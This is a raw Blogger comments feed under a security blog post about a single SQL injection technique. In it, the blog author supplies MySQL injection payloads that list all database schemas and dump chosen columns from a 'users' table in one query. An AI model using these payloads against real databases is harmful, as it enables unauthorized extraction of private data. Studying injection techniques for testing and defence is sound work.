tag:blogger.com,1999:blog-2753254247831520911.post5820448299333759396..comments2022-04-02T19:12:57.350+01:00Comments on Frosty Hacks: One SQLi to rule them allFrostyhttp://www.blogger.com/profile/14742453902401322872noreply@blogger.comBlogger6125tag:blogger.com,1999:blog-2753254247831520911.post-77112829387671862702016-01-14T11:32:01.732+00:002016-01-14T11:32:01.732+00:00Try this
select (@) from (select (@:=''),...Try this<br /><br />select (@) from (select (@:=''),(select (@) from information_schema.schemata where (@) in (@:=concat(@,schema_name))))x;<br /><br />If you can't use apostrophes when declaring @ then use 0x00 instead.Frostyhttps://www.blogger.com/profile/14742453902401322872noreply@blogger.comtag:blogger.com,1999:blog-2753254247831520911.post-56694753982136214252016-01-14T09:01:55.920+00:002016-01-14T09:01:55.920+00:00Why it returns empty row, but in this tutorial, it...Why it returns empty row, but in this tutorial, it can get all databases?123movies officialhttps://www.blogger.com/profile/00861634368543286129noreply@blogger.comtag:blogger.com,1999:blog-2753254247831520911.post-54997250159199299842016-01-14T09:01:05.882+00:002016-01-14T09:01:05.882+00:00Could you explain for me this query:
mysql> se...Could you explain for me this query:<br /><br />mysql> select (@) from information_schema.schemata where (@) in (@:=(concat(@,schema_name)));<br />Empty set (0.00 sec)123movies officialhttps://www.blogger.com/profile/00861634368543286129noreply@blogger.comtag:blogger.com,1999:blog-2753254247831520911.post-35866410410810123642015-10-05T09:18:44.103+01:002015-10-05T09:18:44.103+01:00There's already an example which selects all t...There's already an example which selects all the column data under the heading "Selecting an entire table in one query", here you just want to replace the "COLUMNS" with a comma delimited list of the column names you want and set the "TABLE" to be the table name you want. For example if your table name is "users" and the column names are id and s then your query would be<br /><br />(select (@) from (select (@:=0x00),(select (@) from users where (@) in (@:=concat(@,0x0a,id,s))))x)Frostyhttps://www.blogger.com/profile/14742453902401322872noreply@blogger.comtag:blogger.com,1999:blog-2753254247831520911.post-75091844881560877062015-10-04T11:34:22.624+01:002015-10-04T11:34:22.624+01:00how to dump column data , can you give an example ...how to dump column data , can you give an example command / for table users , clumns are id , sAnonymousnoreply@blogger.comtag:blogger.com,1999:blog-2753254247831520911.post-75816680178439795902014-11-10T11:57:46.132+00:002014-11-10T11:57:46.132+00:00Good work Hope to look some more posts :)Good work Hope to look some more posts :)Pwntokenhttps://www.blogger.com/profile/07982831495608351527noreply@blogger.com